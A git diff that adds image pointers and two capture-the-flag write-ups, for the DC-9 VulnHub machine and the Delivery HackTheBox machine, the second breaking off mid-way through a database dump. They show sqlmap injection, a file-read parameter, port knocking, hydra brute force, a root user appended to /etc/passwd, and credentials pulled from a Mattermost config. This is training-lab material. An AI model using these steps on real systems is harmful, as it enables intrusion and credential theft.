b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.webp new file mode 100644 index 0000000..53e972f --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7af0948bed4fbfd7cc25382689f582ab58f57b020d629f4b1b9da9f9b7493baf +size 29634 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.png new file mode 100644 index 0000000..d9a7165 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f722e870e9a9f5282a496e46dcff7bcd56b2ef09d7238e016ea8db2abfe47d38 +size 14486 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.webp new file mode 100644 index 0000000..a2bd4c7 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0f36ae8dac022dec347b4b75b4852258b9494ed86b950f3964268a7e986a4181 +size 16686 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.png new file mode 100644 index 0000000..3efb5ed --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9682cabbf189e69301711b3c13ad571d09cb62db12173f2d58f24339e978aadc +size 46986 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.webp new file mode 100644 index 0000000..e0d673c --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:70359dc674f6fd1a8dfadf88431c3385eb4ea415f31d3cc21878d0438913d694 +size 56596 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.png new file mode 100644 index 0000000..4a089a8 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf4c1fc651464aeea54d376e6f783291caad7faa5e8b71138e8bb8f18292418b +size 61783 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.webp new file mode 100644 index 0000000..bc61ace --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:61acfc45eb4edd08569b72fe3400813c70614bbd98c942b36c3e41df8d2c7704 +size 19384 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.png new file mode 100644 index 0000000..0f6eb63 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f050e714b6fb1bebef61751ff5d3561e0562974f36d23adbf07c22e257ff74d7 +size 106125 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.webp new file mode 100644 index 0000000..1f1db91 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7943c8181d864f7270ba0d7ab45cf6a77d18605776483ced42019bccd71d942 +size 97866 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.png new file mode 100644 index 0000000..0768c4a --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1673635bc02814fee1cdb62fdee4507a1154846e5a05e970c343e3cdeb8ea60c +size 18226 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.webp new file mode 100644 index 0000000..c3f6ce6 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:caf3d4555784f4e0f416827f055aa2dc8ffedb5cb401163864a560d5fc8ed6a4 +size 19198 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.png new file mode 100644 index 0000000..be2e2d1 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05ce225d676c31e1ce407246c1b0bd908a03cc357a53e1c1e4a22c14cb98a792 +size 37564 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.webp new file mode 100644 index 0000000..b630832 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c4c4b8948bf91d18f195b3b266aa3adec84363fc2b4c40ce80687679740f8a47 +size 62438 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.png new file mode 100644 index 0000000..4ad9a5d --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7e53a8a590503a62efde7599422bf0d68a8d9464b5a398611737924e786df574 +size 121021 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.webp new file mode 100644 index 0000000..77f3ffa --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b034f91dabeef7a81dcaf1bb7a5d3f88d6819ca93f7ce8e96e9473a894c11ef +size 118912 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.png new file mode 100644 index 0000000..973df2e --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:32710a593d0a2cfb7bd0f632aa9435dcf56c4b9a228f2f3752e18f959ceca5dc +size 10281 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.webp new file mode 100644 index 0000000..11be4f2 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:182393ed0059bebd361b7b068332befdb64c8a8577f81c4cd15959b3d7744cd0 +size 9636 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.png new file mode 100644 index 0000000..d4bc7c8 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:db181ed3308cc1640bb896d8004ee4ae970c09c8d8bffb7e52f4c872e0eff62b +size 37448 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.webp new file mode 100644 index 0000000..ee4ea84 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:96697242a1947b571f7a4baba36431a372b3d99c5e346a9549f98b5cbd13e17f +size 31896 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.png new file mode 100644 index 0000000..f38674d --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c349d49aea2821aa664f054335ed44e008116687b6b3dac3e0fde72320c8e32f +size 72497 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.webp new file mode 100644 index 0000000..bffc694 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ae9b3879770168212f4f999e9d28278e541e93f35fa7997d94b9edc7d9af07d6 +size 64688 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/index.md b/content/writeup-ctf/writeup-dc-9-vulnhub/index.md new file mode 100644 index 0000000..a57ebc1 --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/index.md @@ -0,0 +1,135 @@ +--- +title: "Writeup - DC-9 (VulnHub)" +date: 2022-05-10 +slug: "writeup-dc-9-vulnhub" +type: "writeup-ctf" +--- + +This is a writeup for the [DC-9](https://www.vulnhub.com/entry/dc-9,412/) machine from the VulnHub site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 192.168.56.101 +``` +One TCP ports are discovered: + +![](img/image-1.webp) + +- 80/tcp : HTTP web server (Apache 2.4.38) + +![](img/image-2.webp) + +## Exploit + +At first I start by making a scan of the website folders. + +![](img/image-3.webp) + +Quite a lot of different pages, I start by making a capture of a request sent by the `search.php` page with the help of Burp. + +I then run a SQL vulnerability scan with `sqlmap`. + + +```bash +sqlmap -r request.txt --dbs --batch +``` +The target is usable, I find 3 databases in the result of the command. I start with `users` : + +![](img/image-4.webp) + +![](img/image-5.webp) + +Many different credentials... Looking in the `Staff` database, I find an admin password hash. + +![](img/image-6.webp) + +So I go on [crackstation](https://crackstation.net/) to try to find it. + +![](img/image-7.webp) + +I can now connect to the admin panel of the site. In this panel we have the possibility to add records. I notice that at the bottom of the page `manage.php`, there is an error message : `File does not exist`. I wonder if there is not an argument. After some test I find that there is a `file` argument. This allows me to find the following file: + + +```bash +File does not exist +[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn +``` +This is a file that allows you to configure port knocking to unblock the SSH port! + +So I try to realize the sequence with the following commands: + + +```bash +nmap -Pn --max-retries 0 -p 7469 192.168.56.101 +nmap -Pn --max-retries 0 -p 8475 192.168.56.101 +nmap -Pn --max-retries 0 -p 9842 192.168.56.101 +``` +And indeed it worked, I now have access to the SSH port: + +![](img/image-8.webp) + +In the database export, we found a lot of names and passwords. I create two lists and launch an automatic test of the different combinations with `hydra` : + +![](img/image-9.webp) + +After a few minutes `hydra` finds several combinations that work. It is by connecting as a `janitor` that I finally find an interesting file: + +![](img/image-10.webp) + +A list of passwords, so I add them to my existing list and I restart `hydra` : + +![](img/image-11.webp) + +A new combination is found! So I connect in SSH. + +## Privilege escalation + +I start by checking the sudo permissions of my user. + +![](img/image-12.webp) + +By executing the script I understand that it uses two arguments: one in reading and the other in writing. + + +```bash +fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test +Usage: python test.py read append +``` +I will try to add a new admin user to the system. To do this I start by generating a hash+salt with the following command: + + +```bash +fredf@dc-9:~$ openssl passwd -1 -salt d3vyce azerty +$1$d3vyce$n/tLRqvTUr3ygHuTSvi9g1 +``` +I add the line of my user in a temporary file : + + +```bash +fredf@dc-9:/opt/devstuff/dist/test$ cat ~/user.txt +d3vyce:$1$d3vyce$n/tLRqvTUr3ygHuTSvi9g1:0:0:root:/root:/bin/bash +``` +Then I add my user with the following command: + + +```bash +sudo ./test ~/user.txt /etc/passwd +``` +Finally I change user: + +![](img/image-13.webp) + +I now have a root shell on the machine! + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update the site to avoid SQL injection +- Do not leave an argument `file` if not used +- Do not store clear passwords in a database +- Do not let a script run in root if not necessary diff --git a/content/writeup-ctf/writeup-delivery-htb/featured.png b/content/writeup-ctf/writeup-delivery-htb/featured.png new file mode 100644 index 0000000..e155c1b --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6f7262234baf3dd0cdb39325168027ac6ff67e9fca4423ddb01317824fcf28c0 +size 310041 diff --git a/content/writeup-ctf/writeup-delivery-htb/featured.webp b/content/writeup-ctf/writeup-delivery-htb/featured.webp new file mode 100644 index 0000000..e747a36 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9bf898d00b2a0704be5025d42f640dc8afd9704665003657aa4f9c19c4b9904 +size 30300 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-1.png b/content/writeup-ctf/writeup-delivery-htb/img/image-1.png new file mode 100644 index 0000000..801bb70 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9505ecfc74d9f669a4a146566e8618cdf8ee216195cd3ae981338f2b5014b7b6 +size 25076 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-1.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-1.webp new file mode 100644 index 0000000..6ab32b9 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64d183feb0f353d4c7bd7e9fc979905a40375fcfea69a3ed6a4d3471b8067001 +size 27520 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-10.png b/content/writeup-ctf/writeup-delivery-htb/img/image-10.png new file mode 100644 index 0000000..1a384a4 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:660bdcd6c7117269aea69138fd65b75396f598d378ce6e93bb07fd073d00488d +size 35354 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-10.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-10.webp new file mode 100644 index 0000000..d7d6099 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:77c22356488b6208d6d96907e95a12b2c529f044364ee75af2da9a2e7afb04c7 +size 45502 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-11.png b/content/writeup-ctf/writeup-delivery-htb/img/image-11.png new file mode 100644 index 0000000..bc6b650 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51931f223f91c55fee25485d412b695aed87cf1933d13f784bf98153f6e77319 +size 9982 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-11.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-11.webp new file mode 100644 index 0000000..b78a4f4 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76cf9676874f355b866b14f7679a60c8fbd6bc5211f70409d04a42bd554c8bd0 +size 11762 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-2.png b/content/writeup-ctf/writeup-delivery-htb/img/image-2.png new file mode 100644 index 0000000..b21f333 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:160dca0b384c2923a4ec6feb9024a4b22c461ccdc7e171f907005e5da322ebee +size 1561452 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-2.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-2.webp new file mode 100644 index 0000000..f3ec2a1 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bad96df211ff777046e28a0356b1838ac7fb4bdbf4645aa40a969ee0bc77c34c +size 34466 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-3.png b/content/writeup-ctf/writeup-delivery-htb/img/image-3.png new file mode 100644 index 0000000..35a159f --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:227ed4ec08cd0ad0abc904f499982bb79b1ed1dc0c5ff2f1c017031c640fb341 +size 75032 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-3.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-3.webp new file mode 100644 index 0000000..41e2b3c --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:966c7a23bb7de8fcb24db74a8d6fe8653f08820b3440f288a5243f38768fa6f6 +size 38280 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-4.png b/content/writeup-ctf/writeup-delivery-htb/img/image-4.png new file mode 100644 index 0000000..b1a46f4 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5da649dae7e506c0326286c2ca7097d255ca81e4451eea17d427e6314ecd3f00 +size 22649 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-4.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-4.webp new file mode 100644 index 0000000..ea8c580 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:577421982fa2cc4c17bebc8fa1031ab23d2de33dfdd8799f2352af88542e972a +size 17594 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-5.png b/content/writeup-ctf/writeup-delivery-htb/img/image-5.png new file mode 100644 index 0000000..eea5b76 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff6796fb338fc2a5d471c5aedd1336ba62914401112846536538e07036ed7f3f +size 63504 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-5.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-5.webp new file mode 100644 index 0000000..336bca2 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:826060d8b19832cdb57dcd86d23ea6edb6fe1f807d15f45076b0b23929f4d773 +size 46186 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-6.png b/content/writeup-ctf/writeup-delivery-htb/img/image-6.png new file mode 100644 index 0000000..2260410 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:223568176a1eb5e3a6aca1ca01b5b0cbafe6a7eea3cd9c742eef35ec26262cf3 +size 22609 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-6.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-6.webp new file mode 100644 index 0000000..6eebda3 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:518af2e113872346508619dd9a91faebe0c40bf77019b083b70ae56fa8fb4d67 +size 13654 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-7.png b/content/writeup-ctf/writeup-delivery-htb/img/image-7.png new file mode 100644 index 0000000..dc9815a --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ef1663cf0940409fdf0276584b80b6d5e7b4f1dce51fd6b813616ca1b3f9d18c +size 49865 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-7.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-7.webp new file mode 100644 index 0000000..6fc999c --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:39cdcea7bca913f7e4cca527ba934ab85680e1c9bb7a2d9af662106515255f9b +size 35364 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-8.png b/content/writeup-ctf/writeup-delivery-htb/img/image-8.png new file mode 100644 index 0000000..050ec21 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e516863c8181b6d0a80f175d851f991d8760ac96498b4244b2403c9e1d1f2837 +size 19230 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-8.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-8.webp new file mode 100644 index 0000000..161f6c1 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6960e0fdd979b157eebe309779ad4c908f54add36427d187409290854403313a +size 12382 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-9.png b/content/writeup-ctf/writeup-delivery-htb/img/image-9.png new file mode 100644 index 0000000..d29ef8a --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ae5e2be1c17c432025a5ff5b46676e9069d6fba9fad2086b19cea3acde3e6dc +size 45539 diff --git a/content/writeup-ctf/writeup-delivery-htb/img/image-9.webp b/content/writeup-ctf/writeup-delivery-htb/img/image-9.webp new file mode 100644 index 0000000..4dc4eee --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fd06676afc3a924198c36568a61f63ba3760c12d48b6d42f27bb8869b3032f4b +size 32840 diff --git a/content/writeup-ctf/writeup-delivery-htb/index.md b/content/writeup-ctf/writeup-delivery-htb/index.md new file mode 100644 index 0000000..43aaac6 --- /dev/null +++ b/content/writeup-ctf/writeup-delivery-htb/index.md @@ -0,0 +1,169 @@ +--- +title: "Writeup - Delivery (HTB)" +date: 2022-03-27 +slug: "writeup-delivery-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Delivery](https://app.hackthebox.com/machines/Delivery) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.146 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.9p1) +- 80/tcp : HTTP web server (nginx 1.14.2) +- 8065/tcp : ???? + +![](img/image-2.webp) + +## Exploit + +After checking the site, I quickly found the `helpdesk` section. It is a site that allows the sending of tickets to support. + +![](img/image-3.webp) + +I first try to create an account, but it's impossible, I need the validation of an admin to confirm the account. Then I try to create a ticket: + +![](img/image-4.webp) + +I then go to view it using my email and my ticket number, I arrive on the following page: + +![](img/image-5.webp) + +In parallel I go to visit the third open port and I find the following page: + +![](img/image-6.webp) + +I try to create an account, but the site asks me to validate the account via email. I first try to use a temporary email, but I get no confirmation. Then I notice that when I create a helpdesk ticket, it is indicated that I can send emails to the address `3998604@delivery.htb` to add additional information to the ticket. So I use this address when creating the account and when validating I go back to the ticket site and find the following message: + +![](img/image-7.webp) + +I can now validate my account and log in. I get the following page: + +![](img/image-8.webp) + +After a little exploration I came across this discussion: + +![](img/image-9.webp) + +There is a login/password let's try to use it to connect in SSH: + +![](img/image-10.webp) + +Ok I now have a shell in `maildeliverer` time and I can get the first flag. + +## Privilege escalation + +I know that the chat application is `mattermost` and that the configuration files for this application are in the `/opt/mattermost`folder. So I start to inspect these files. I find the config file where there are credentials for the access to the database: + + +```bash +"SqlSettings": { + "DriverName": "mysql", + "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTi$ + "DataSourceReplicas": [], + "DataSourceSearchReplicas": [], + "MaxIdleConns": 20, + "ConnMaxLifetimeMilliseconds": 3600000, + "MaxOpenConns": 300, + "Trace": false, + "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez", + "QueryTimeout": 30, + "DisableDatabaseSearch": false + }, +``` +I connect with the following command: + + +```bash +mysql -u mmuser -p Crack_The_MM_Admin_PW -D mattermost +``` +I first list the tables: + + +```bash +MariaDB [mattermost]> show TABLES; ++------------------------+ +| Tables_in_mattermost | ++------------------------+ +| Audits | +| Bots | +| ChannelMemberHistory | +[...] +| Threads | +| Tokens | +| UploadSessions | +| UserAccessTokens | +| UserGroups | +| UserTermsOfService | +| Users | ++------------------------+ +``` +Then I display the data of the Users `Users` : + + +```bash +MariaDB [mattermost]> SELECT * FROM Users; ++----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+--------------------------------------------------------------------------------------------+-----------+-----------+ +| Id | CreateAt | UpdateAt | DeleteAt | Username | Password | AuthData | AuthService | Email | EmailVerified | Nickname | FirstName | LastName | Position | Roles | AllowMarketing | Props | NotifyProps | LastPasswordUpdate | LastPictureUpdate | FailedAttempts | Locale | Timezone | MfaActive | MfaSecret | ++----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+--------------------------------------------------------------------------------------------+-----------+-----------+ +| 64nq8nue7pyhpgwm99a949mwya | 1608992663714 | 1608992663731 | 0 | surveybot | | NULL | | surveybot@localhost | 0 | | Surveybot | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1608992663714 | 1608992663731 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | +| 6akd5cxuhfgrbny81nj55au4za | 1609844799823 | 1609844799823 | 0 | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | NULL | | 4120849@delivery.htb | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844799823 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | +| 6wkx1ggn63r7f8q1hpzp7t4iiy | 1609844806814 | 1609844806814 | 0 | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | NULL | | 7466068@delivery.htb | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844806814 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | +| 7z9izpo1wfrnddytkm8815wg4w | 1647894531289 | 1647894703010 | 0 | azerty | $2a$10$Dwc/LdQGFD0PdJrmLwD07uTbZE1CfpswRJCMsoGKeJHKtn4/LIPW. | NULL | | 3998604@delivery.htb | 1 | | | | | system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1647894531289 | 0 | 0 | en | {"automaticTimezone":"America/New_York","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | | +| dijg7mcf4tf3xrgxi5ntqdefma | 1608992692294 | 1609157893370 | 0 | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | NULL | | root@delivery.htb | 1 | | | | | system_admin system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609157893370 | 0 | 0 | en | {"automaticTimezone":"Africa/Abidjan","manualTimezone":"","useAutomaticTimezone":"true"} 